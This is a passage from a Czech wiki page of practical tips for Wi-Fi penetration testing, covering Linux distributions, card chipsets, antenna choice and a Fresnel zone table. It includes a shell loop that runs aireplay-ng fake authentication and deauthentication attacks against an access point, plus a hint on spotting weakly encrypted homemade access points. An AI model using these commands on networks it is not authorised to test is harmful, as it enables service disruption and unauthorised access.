Man ukončíte pomocí „q“ Bežíci aplikaci v konzole pomocí „ctrl+c“ Existuje řada užitecných přikazů. Oplatí se číst. Možnosti Linuxu jsou obrovské

while [ "1" ]; do aireplay-ng -1 0 -e ap_franta -a 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0;
sleep 6; aireplay-ng -0 5 -a 00:60:xx:xx:xx:xx eth2; sleep 6; done
  • Techniky implementovány v aplikaci Aireplay fungují 100% pouze v distribucích Linux. Existuje hack pro Windows XP, je ale nestabilní.
  • Vše, co stahujete pomoci wget, najdete ve složce kde aplikaci použijete. Stejne tak log aplikace Airodump. Standardně home adresář uživatele /home/user nebo v Backtrack a Wifislax /root (protože se do systému přihlásite rovnou jako root).
  • DVD ISO Ubuntu 6.06.1 můžete objednat poštou nebo stáhnout napr. zde
  • Před instalací operačního systému se raději poraďte. Disk rozdělte předem. Čistá instalace je nekomplikovaná i pro nezkušeného uživatele. Rozdelení hardisku u instalace Ubuntu vyžaduje oznacit „/“ a „/swap“. Pro / nadělte 5 až 10 GB prostor, pro swap maximálně 1GB.
  • Pro jednorázový penetrační test vystacite s LiveCD BackTrack, WifiSlax nebo se starším Auditor. Tyto distribuce v ISO lze pred vypalenim modifikovat. Není je potřeba instalovat. LiveCD aplikace misto hardisku používá operační paměť.
  • Každou aplikaci [Wellenreiter, Nessus, Hydra, Kismet, Metasploit a pod.] obsažena v specializovaných distribucích, je možné instalovat a provozovat i pod Ubuntu. Obdoba specializovanych CD je nUbuntu.
  • MAC Access Pointu která začíná 00:60:B3 nemá sifrovani silnější než 128 bit. Jedná se o home made. AP je v tomto případě počítač s kartou Z-Com (Debian + hostapd). Karta Z-Com neumi 256bit sifrovani ani WPA.
  • Nepouzivejte Kismet starsi jako verze 2005.08.R1. Je dokumentovana (kriticka) chyba (integer underflow). U zpracovani netisknutelnych znaku v SSID (zpracování souboru pcap - rozklad datových ramcu) umozní spustit libovolny(?) kód.
  • Wifi kartu nakupujte vyhradne podle chipsetu. Osvedceny je Prism (hostap) a Atheros (madwifi). RTL8180 funguje. (napr. Edimax EW-7126 PCI). Géčkova verze už má jiny chipset.
  • Mimo „stůl“ bez vhodne anteny ztracite cas.
  • Vyzařovací uhel wifi anteny 30 nebo vic stupnu je vhodný pro detekci bezdrátových sítí. Pro připojení na větší vzdálenost (> 2km) v zarušeném prostředí se nehodí. Protoze na jedne frekvenci muze byt vice AP a frekvence se v pasmu 2,4GHz prolinaji, vzdy zachytite i nezadouci trafik (rušení). Vhodna antena je uzce (8°) směrová. Když antena není umistena v otevrenem prostoru, je vhodne pouzit antenu ktera „nesviti“ dozadu. Umístěním na zeď lze příjem citelně ovlyvnit (negativně). Ideálni je plná parabola. SWR je důležitější parametr než zisk nebo útlum. V kombinaci se širším vyzařovacím uhlem nemusíte se vzdálenějšim Access Pointem (detekovanem v Airodump) vůbec ustavit spojení. Plnohodnotné spojení (dle karty a ovladaču) vyžaduje minimálni hodnoty, jinak se spojení rozpadne.

Oficiálni minimum u CM9 je -95dB, Z-Com -92dB (myslím, že Z-Com je v reálu někde kolem -85dB). Orientačně: Rate 1Mbit, 15dB smerova antena = 4 km

Tabulka - Fresnelova zóna:

Vzdálenost [m] Pásmo [m]
2,4 GHz 5 GHz
100 1,37 1,22
200 1,93 1,73
300 2,37 2,12
400 2,73 2,44
500 3,06 2,73
700 3,62 3,23
1000 4,32 3,87
1200 4,73 4,23
1500 5,29 4,73
2000 6,11 5,47

Nepokládejte konektor pigtailu na topení. Pokud máte starší (kovovou) totálni endoprotézu loketního kloubu, držte anténu druhou rukou :-)

Osobní nástroje
Jmenné prostory

Varianty
Akce
Portál AMP
WiKi Navigace
Nástroje